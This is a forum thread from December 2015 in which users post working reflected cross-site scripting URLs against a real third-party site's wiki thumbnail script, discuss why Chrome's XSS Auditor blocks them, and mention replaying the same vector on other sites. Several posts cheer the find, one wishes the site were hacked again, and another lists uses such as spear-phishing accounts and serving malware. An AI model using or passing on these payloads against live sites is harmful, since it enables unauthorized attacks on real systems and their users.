lol hackforums
#1
Quote:http://tracking.hackforums.net/tracking/...E%65%74%2F
Reply
#2
Returns "Not Found" for me, but I assume if you were to replace "Greysec" with a malicious parameter like xss I might get some output? Or maybe they already fixed it. Haha
Reply
#3
Xss also

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onmousemove=confirm%28%27XSS%27%29%3E
Reply
#4
(12-22-2015, 07:11 PM)MLT Wrote: Xss also

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onmousemove=confirm%28%27XSS%27%29%3E
Thats just GOLD
Nice find MLT
I wish they got hacked again, just like when LulzSec did it
Reply
#5
(12-23-2015, 09:25 PM)AFK Wrote: How is that an XSS? Nothing happens.

Its an XSS take a look at the source output from it.

[Image: zi-dTBaUnSemh.png]

Most likely you're using Chrome which blocks certain basic attacks, you'd have to use a more complicated payload to get around Chrome blocking the XSS, that doesn't mean its not there though.

Code:
The XSS Auditor refused to execute a script in 'http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onmousemove=confirm%28%27XSS%27%29%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.
Reply
#6
Yep, working fine in Firefox. For quick testing in chrome you could still inject html i.e <marquee>lololol</marquee> to see it working
Reply
#7
A slightly less annoying example, but good find.

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onload=console.log%28%27XSS%27%29%3E
Reply
#8
I'm not sure what I would do with this information, but it's a pretty damn good find.

I know someone who could do great stuff with this.
Reply
#9
(12-24-2015, 02:07 AM)NO-OP Wrote: A slightly less annoying example, but good find.

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onload=console.log%28%27XSS%27%29%3E

yea the 'onload' event handler works fine - i was just using onmousemove because onload was blocked for the owasp.org XSS (same vulnerability) so i've just used the same vector while replicating this on other sites.

(12-24-2015, 08:00 AM)TheEvilSocks Wrote: I'm not sure what I would do with this information, but it's a pretty damn good find.

I know someone who could do great stuff with this.


Well, hijacking cookies is out of the question but in theory it could still be used for spear phishing hackforums accounts, serving malware, blackhat SEO, etc.
Reply
#10
Btw omni told that he has nothing to do with the wiki subdomain. It's been handled/hosted by someone else.
Reply